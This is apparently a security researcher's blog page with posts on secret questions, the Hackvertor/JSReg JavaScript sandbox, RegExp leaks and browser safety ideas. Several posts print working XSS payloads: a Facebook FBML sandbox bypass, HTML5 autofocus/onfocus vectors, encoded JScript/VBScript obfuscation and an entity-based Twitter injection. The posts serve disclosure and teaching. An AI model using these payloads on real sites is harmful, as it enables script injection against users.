Skip to content

Solving the secret question problem

I love to think of unsolvable problems and try to solve them. I dunno why I just enjoy it. One of the most challenging problems is “secret questions”. Everyone sucks at this, I’m looking at you Google. One of the first lines of defence for a unverified account can be a secret question. This is why my dog is called “mi(mqure~sb$ztrcjeoosc*m;wbyowdd@” online.

How to solve it? Well at first I thought of questions like “Which picture do you have in the front room of your house?” but there are problems. Like anyone can visit your house and see the picture or look through your window. The physical aspect of them having to do that though reduces the likelihood of it happening unless they really want your account. Doing this over a few accounts is also less likely because you’d need to visit all their houses.

Or do you? Damn you flickr. People upload pictures of their houses, this is bad using as part of a secret question because you can clearly piece the information together if available. Bruteforcing is hard though because your automated program would need to understand the question. Unless the attacker builds an automated program that gathers the accounts and questions in various frames and can picture the correct answer. Oh dear this is harder than it sounds. What if you decide to bin the picture? Not good so I thought of something else.

Open your hands and look at them. Can you see the ridges between your fingers? You carry this data with you all the time, it’s hard for someone to obtain without taking a detailed picture of your hands. We can use this data! Example instead of a question “What is your favourite cats name?” the better questions would be series of:-

“Please tell me How many ridges there are on your first finger left hand?
“Please tell me How many ridges there are on your fourth finger right hand?
“Please count the number of large ridges on your palm right hand”

You would require more then one question at a time and the you’d have to be careful about the questions chosen. I thought of ridges because they would be pretty different for each person and they wouldn’t mind disclosing the information.

Posted 29 March 2010 Gareth Heyes § Security § articles Comments (7)

Writing Hackvertor tags

My one man mission to create a social coding network is going well, if you read this blog previously you’ll remember my attempts at a JavaScript sandbox until I finally settled on JSReg as a method. I’ve refined the process of creating tags after trying to build them myself using the editor.

How to create a tag

Login to Hackvertor and click “Create tag” this will give you a JavaScript editor with a default blank tag. I’ve added this as guidance, the first part of the sample is a simple if statement that checks the first param for something. Params are tag params that the user can change when using your tag, the editor has these three params on the left hand side so that you can test. Lets say your tag supports one parameter and either encode or decode, place encode in the first param box and you can test that state in the editor.

You might notice that the sample tag uses an anonymous function, this makes it easier for you to return the output from the tag. You don’t need one for simple tags but I recommend you use one when developing more complex ones.

The left hand side also contains “name” which is the name of your tag and category to appear in the application home page, the help text at the bottom lets you describe what your tag and params does. This is useful for the user as before they add the tag they can hover over it and read what it does.

Every tag extends the special object property “HV” which allows you to reuse your code and others. Lets say you want to reverse some text, rather than writing this yourself you can use the HV object like so:-

code = code.HV('reverse');
(123).HV('reverse')

Notice this works with any object as demonstrated in the second part of the sample code.

In order to work with user input a special variable is automatically assigned called “code” you can test user input by placing something in the user input box above the editor. This automatically gets assigned to “code” and allows you to test your tag. Each time you modify the tag the code is automatically executed and any syntax errors will be reported.

You can also look at previous tags for inspiration.

Limitations

Like anything the sandbox isn’t perfect, one of the most common problems you’ll encounter will be arrays. When using arrays you need to make sure you define them using Array() not [] as it is assumed in the sandbox that [] is a object property accessor. Using the Array constructor can be tricky because Array(1) creates an array with a length of 1 but NOT with a value of 1 in the first element.

Try not to use complex for loops and avoid for..in loops where possible until the sandbox handles loops more effectively.

Special powers

I’ve added a fun element to creating tags. When you add tags in Hackvertor you get points and a special, when someone votes for your tag you get points, if a tag is malicious or bad you can get points removed. When you reach a certain status with the amount of points you’ve accumulated you’ll be able to perform a special power.

There are currently 7 special powers and depending what status you are you’ll be able to use them on weaker foes. This feature is experimental and I could remove it change it slightly depending on the results. Points can also be negative and will be awarded if a user tries to do some vote rigging or maybe forgets to select a user to perform a special power on. You’ve been warned :)

Posted 24 March 2010 Gareth Heyes § Security § hackvertor § javascript Comments (0)

Hackvertor API

Over the weekend Stefano Di Paola broke my JSReg sandbox with some awesome vectors in particular the Opera one. He took my challenge after I laid down the gauntlet on the web app sec list. If you have some sandbox you want breaking, some Flash you need testing or general pen test work you should hire this guy he is awesome.

I patched JSReg by removing the prototype, callee, caller from the allowed properties, hopefully this will stop future attacks using this method until I can work out a way to use these safely. Then I got a bunch of great suggestions from Thornmaker and SDC, that made so much sense I reworked the recent Hackvertor code to modify the Object protoype. So now Hackvertor tags can call each other easily using this method for example:-

'abc'.HV('reverse').HV('base64',Array('encode'))

The API is extended further where you can include data and share it across tags, this is super useful when creating a standard list of XSS vectors, Unicode characters, shellcode whatever you like! First the example shows how a tag can be used to return array data. The second example shows how you can use this data within tags.

Data sample
Using the data

What’s great about this is that the data can also now be used externally, you can embed the sandbox from an external site and use your data. Of course using untrusted tags poses a risk that I’ll need to account for but if you only use your own tags it should be pretty safe to use them for fuzzers or other data.

Here is how to embed my version of Hackvertor tags:-

<script src="http://hackvertor.co.uk/export?id=1"></script>
<script type="text/javascript">
window.onload = function() {
parser = JSReg.create();
try {
		parser.extendObject('$HV$',(function(tags) {
				return function(tagName, args) {
					if(!tags.hasOwnProperty(tagName)) {
						return null;
					}																			

					return tags[tagName].execTag(this,function(output){ return output; },args);
				   }
			})(window.Hackvertor.tags)
		);
		//EXECUTE YOUR OWN CODE HERE
		parser.eval("alert('abc'.HV('reverse'))");
	}
	catch (e) {
		alert(e);
	}
}
  </script>

At the moment Hackvertor doesn’t have all the tags the previous one had yet but why not help out and build a security tool together in the first coding social network.

Posted 15 March 2010 Gareth Heyes § Security § hackvertor § javascript Comments (2)

Hackvertor and JSReg

I’m not a developer any more so I find it difficult to update the experiments I’ve been working on but I managed today to upload the work I’ve done with JSReg and update Hackvertor. They are both integrated closely together because Hackvertor allows untrusted Javascript using JSReg.

The recent upgrade to JSReg allowed me to upload the Hackvertor changes I did a while ago, it is now very nice and easy to share code between users. At the moment registration is disabled but I plan to enable it once I’ve figured a way to stop user’s overloading the tag list.

You can see how the integrated JSReg parser works by visiting Public Hackvertor this will eventually replace the original one now online. There are only a limited set of tags as I’ve not had time to code them all but we have a couple of users on there that might start adding code if they haven’t forgotten their password =)

I found the untrusted Javascript feature difficult to code as sharing each tag inside a tag for example would require some tricky Javascript but I think I’ve managed to pull it off. I’ll document the JSReg stuff here and how Hackvertor allows tag objects inside tags.

Playing nice with JSReg

In order to use the parser effectively we need to be able to inject our own objects into the sandboxed environment without compromising the security of the sandbox. To do this JSReg supports some extension functions which allows you to inject a object directly. The following code sample shows you how to do it:-

parser.extendWindow('$tags$',(function(tags) {
  return function(obj, callback) {
		var code = obj.$code$;
		var tag = obj.$tag$;
		var param1 = obj.$param1$;
		var param2 = obj.$param2$;
		var param3 = obj.$param3$;
	if(!tags.hasOwnProperty(tag)) {
		return null;
							}
return tags[tag].execTag(code,callback,[param1,param2,param3]);
}
})(window.Hackvertor.tags)
);

So here the “parser” is the JSReg parser, we use the extendWindow function to place a “$tags$” object within the sandbox. Notice the $ prefix and suffix, this is how JSReg protects objects/properties. We use a closure to send a Hackvertor Tag object to the sandbox which passes it a function that accepts a tag object and a callback. Hackvertor now uses callbacks for each tag, this allows conversions to be run in sequence without waiting for each function to return the output.

A simplified version of this can be seen below, this time we assign a value from a dom object outside of the sandbox to a reference inside the sandbox.

parser.extendWindow('$code$',document.getElementById('input').value);

The new Hackvertor

All tags are now user definable! Each tag can have up to three parameters, provide some help text and call existing tags from inside the sandbox :) To create a tag you simply have to return some output, inside a tag it has some special variables that are automatically assigned when a tag is called. The special variables are listed below:-

code, params, tags

The code refers to the original text passed to your tag, this could be plaintext or some text that has been transformed by a previous tag. The params is a simple numeric indexed array which refers to any params supplied by the user so for instance if you tag supports 1 param, you can refer to it inside your tag as param[0]. Tags contains the Hackvertor tag reference mentioned previously and allows you to call existing tags without having to write the same code over and over. I will show below how you to call the base64 tag that currently exists in the Hackvertor tag space.

tags({code:'abc',tag:'base64',param1:'encode',param2:'',param3:''},function(result) {alert(result);})

So this will call the tags function defined by extending the sandbox, it accepts a object and callback as it’s arguments. I send a string ‘abc’ and use the tag ‘base64′ I supply one param ‘encode’ and then use the callback to get the result of the conversion.

Posted 11 March 2010 Gareth Heyes § Security § hackvertor § javascript Comments (0)

My RegExp is still leaking

The great thing about standards is that sometimes they are blindly followed and it’s not until maybe years down the line that you realise they got it wrong. Personally I think standards should be organically developed in code then defined in a standard once the various flaws have been ironed out. Every standard should use code samples for every single thing they define, this way it is quite easy to spot the intention and how to abuse it.

You could argue this is already done but I disagree, we should have standard prototypes with testing code for each then we can use the code samples and the specification. The W3 decided to release a security list which is a fantastic idea but why did we take so long?

Anyway things are changing and that is cool but onto my RegExp I think. Why the standards rant? Well the RegExp object was defined in the specification as a global object that can access the last result among other things of a regular expression literal. I have no idea why, the same result could be achieved using a reference to the regular expression like so:-

a=/a/;
a.test('a');
a.lastMatch;// This doesn't work
//RegExp.lastMatch this does work but shouldn't

So as you can see we can access the result of a expression even without reference to the variable. This is bad when we start mixing untrusted javascript in the future as we don’t want to expose other matches to different untrusted code. What new I hear you say? I posted about this before…well don’t you know that some browsers had the crazy idea of supporting regular expressions as a function, yeah true for some crazy reason rather than a regular expression being a regexp object it is a function! I would like for example the following code to return my user agent string please:-

javascript:alert(/.+/());

I’m not a crazy man honest :) Lets visit mmm apples and lets use Safari and type the string above in the url bar. What do we get? The user agent! If you look at the source code of the page, you’ll find that they use a external javascript file which runs a regexp match on the user agent because this is the lastMatch and we didn’t provide a string to the regexp in the function arguments it decides to return the lastMatch instead of the input we provide. Nice.

This works on Google Chrome too, you might get different results with Firefox if you have noscript installed because it runs RegExp matches on parts of the page.

Posted 04 March 2010 Gareth Heyes § Security § javascript § standards Comments (0)

The safety net

I was thinking about how to prevent a user being exploited lately by whatever method. One thing most attacks have in common is that a user generally needs to initiate the attack by clicking on a email or web site link from a social network. There’s a obvious pattern here. Granted some attacks are conducted on the application itself an XSS worm or network worm for example but these aren’t as common as the majority of attacks that require some form of initiation.

My solution? The safety net! When your average joe clicks on a link from twitter, they usually want to watch a funny video or something. Using this to it’s advantage the safety net detects when this happens, it is aware of the context of a email for example or that this particular social network is quite popular. When a user clicks a link from that context the browser doesn’t need to send any cookie related information from anywhere whilst in the “Safety net”.

It acts as a sandbox for the user protecting them from bad stuff, the user should be aware that they’re in it and should not be able to browse like normal unless they open a new window in the traditional means. It could also work for phishing, prompting the user not to enter any confidential information or maybe disabling form input completely except for whitelisted sources. Corporations could configure their safety net to be more restrictive, a policy for disabling javascript for example or maybe only allowing Flash to play video and not execute actionscript.

If anyone thinks this idea isn’t too crazy and decides to implement it here are a couple of suggestions I’ll refer to the Safety net as SN:-

1. Whilst in the SN any executed javascript or other code should always remain in the SN.
2. New windows or frames should not be allowed in the SN.
3. The browser should look different in the SN to inform the user that they are in a more restrictive browsing experience.
4. Closing the SN should be the only way out of it and the user must be clear that is what is happening.
5. Form input could be restricted in the SN.
6. Session data or cookies should not be transferred from/to the SN.
7. ANY form of download should not be permitted in the SN.
8. Third party plugins should only be allowed in restricted mode for example a PDF file should have a restricted mode which many features are disabled like javascript. Only if this mode is enabled would the PDF be allowed to execute.
9. Full screen mode should be prevented.
10. In the SN it is equivalent of opening the browser for the first time.

Additionally I suggest a meta tag to identify social networks:-

<meta name="identify" content="Social Network" />
Posted 04 February 2010 Gareth Heyes § Security § articles Comments (2)

Facebook sandbox escape

My friend mario (he who never blogs) found XSS in facebook a couple of times. This tempted me to look at their sandbox, I didn’t register for an account but just tried breaking their FBML console.

They have their own FBML (Facebook markup language) which is just a basic HTML/CSS and a separate Javascript sandbox which restricts what you can execute and access by scoping everything to the app ID. I didn’t need to break their Javascript sandbox as breaking the FBML would allow me to execute any code and accessing the document source etc.

I thought the best way to beat the sandbox would be through css expressions as they use the IE7 compat header. I tested their console a couple of times and in 10 minutes found that they fail to parse CSS comments correctly. Next followed incorrect html encoded quotes, so I had the right tools to break out of there but I need to execute Javascript. They allowed stuff like xpression() but I tried double encoding expression in various ways but they seemed to catch it ok. Then I checked their charset which I presumed they use UTF-8 which they do :) I used my old trick of placing a UTF-8 BOM character before the “e” in expression and boom I had a bypass. The first one didn’t work because the quote was in the wrong place but I knew a little modification it would work and the final vector is below:-

<div style=background-image:url('http://&quot;);xss/**/&#x3a;&#65279expression(alert(1));+&quot;')!important;></div>

Note the &#65278 needed to be the actual character in order to break the sandbox but the vector should execute as is anyway and it was easier to see this way. The !important part isn’t required but I just thought I’d assign priority :) The vector has now been fixed by Facebook.

Facebook vector

Posted 29 January 2010 Gareth Heyes § Security § javascript § xss Comments (1)

HTML5 new XSS vectors

So I posted some new XSS vectors on twitter and I thought I’d share them on the blog in case anyone missed them. Safari, Chrome and Opera all support these now :) We have a brand new way of auto executing XSS.

Normally when you find a XSS hole within a input element that has filtered < and > you can’t exploit it automatically without using CSS expressions. The injection looks something like:-

<input type="text" USER_INPUT>

Here you can do style=xss:expression(alert(1)) or moz-binding etc. but it only works on a limited number of browsers. HTML5 however lets us execute like expressions but without css styles. For example:-

<input type="text" AUTOFOCUS onfocus=alert(1)>

We use the “autofocus” feature to focus our element and then the onfocus event to execute our XSS. This works with a plethora (I like that word) of tags. Any form based element it seems you can use this method:-

<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
Posted 06 December 2009 Gareth Heyes § Security § javascript § xss Comments (5)

Ping pong obfuscation

This is a fun post about a feature I found in IE that allows you to do some crazy obfuscation. I’ll start off with some simple examples:-

<img src=1 language=vbs onerror=msgbox+1>
<img src=1 language=vbscript onerror=msgbox+1>
<img src=1 onerror=vbs:msgbox+1>

So here we’re not obfuscating but I’m showing how IE accepts the language attribute and a labelled vbs statement to change the event to allow vbscript instead of javascript. Ok so lets play a little ping pong:-

execScript("MsgBox 1","vbscript"); //executes vbs from js
execScript('execScript "alert(1)","javascript"',"vbscript");

Look how we can call vbscript from javascript by using execScript and then look how we can execute from javascript to vbscript and then back to javascript again! So now we’re playing some ping pong but how can we make our little game hidden?

<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">test</a>

Wait what? Yeah IE supports jscript.encode within the language attribute. Remember jscript.encode? ah the old ones are the best :) That’s it right? Well….

<iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>

Yeah you can use VBScript.Encode and Javascript.Encode as labels within an event! You might be going WTF right now and I can understand it because I did exactly the same but it would be silly to finish now without finishing our game of ping pong. How many rallies shall I do? I think 3 should be enough….

<body onload="&#x6a;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x2e;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x65;&#x3a;&#x23;&#x40;&#x7e;&#x5e;&#x54;&#x41;&#x41;&#x41;&#x41;&#x41;&#x3d;&#x3d;&#x6e;&#x58;&#x2b;&#x5e;&#x55;&#x6d;&#x4d;&#x6b;&#x77;&#x44;&#x60;&#x72;&#x3a;&#x40;&#x24;&#x3f;&#x37;&#x33;&#x68;&#x7a;&#x62;&#x29;&#x29;&#x7b;&#x27;&#x5a;&#x25;&#x51;&#x52;&#x47;&#x3d;&#x32;&#x9;&#x56;&#x37;&#x57;&#x42;&#x20;&#x71;&#x64;&#x47;&#x5c;&#x3a;&#x32;&#x6a;&#x62;&#x65;&#x62;&#x7a;&#x29;&#x27;&#x7b;&#x37;&#x3a;&#x3d;&#x40;&#x24;&#x4a;&#x7e;&#x45;&#x25;&#x6b;&#x6d;&#x2e;&#x6b;&#x61;&#x4f;&#x63;&#x2b;&#x55;&#x31;&#x57;&#x39;&#x2b;&#x4a;&#x2a;&#x43;&#x52;&#x63;&#x41;&#x41;&#x41;&#x3d;&#x3d;&#x5e;&#x23;&#x7e;&#x40;">

Ok so I go to:-
jscript->jscript.encode->jscript.encode->jscript.encode->hex entities

Posted 23 November 2009 Gareth Heyes § Security § javascript Comments (4)

Twitter misidentifying context

This is an important post for me, not because it’s ground breaking but people don’t seem to get this when using data in certain context. If you are a dev please read this and read it until you understand it because if you misidentify context you fail and you fail pretty badly.

I reported this to twitter about two months ago, they responded and fixed four xss holes but two remain and they didn’t contact me to test the fix.

When you are including user input inside a javascript event within a string what do you have to escape? If you answered: ‘”<>\
You are wrong. Twitter is wrong.

Take the following example:-

<a href=# onclick="x= 'USERINPUT' ">test</a>

So you can place your input within the single quotes and there is a place on twitter that does this:-
twitterTheseResults(’ \&quot;\’xss’,'/search?q=&a…

Here they are escaping &quot; with \&quot; and ‘ with \’. But that isn’t enough! Why? Because it’s a javascript onclick event! Inside an event you have to escape entities! All of them!

Consider the following vector:-
&apos;,alert(1),&apos;

No single quotes but &apos; still acts as one. Please look at this test and make sure you understand how it works:-
http://tinyurl.com/xssyoda

Don’t forget other entities work too &#39; &#x27; &#39 &#x27 so make sure you escape all characters within a js event like so:-

<a href="#" onclick="x='USERINPUT\x27\x22\x3c\x3e'">test</a>

and Twitter PLEASE fix this and related holes c’mon it’s been two months, it’s not rocket science to fix.

&apos; works on non-IE browsers but the other entities mentioned work fine on IE too.

Posted 23 November 2009 Gareth Heyes § Security § xss Comments (6)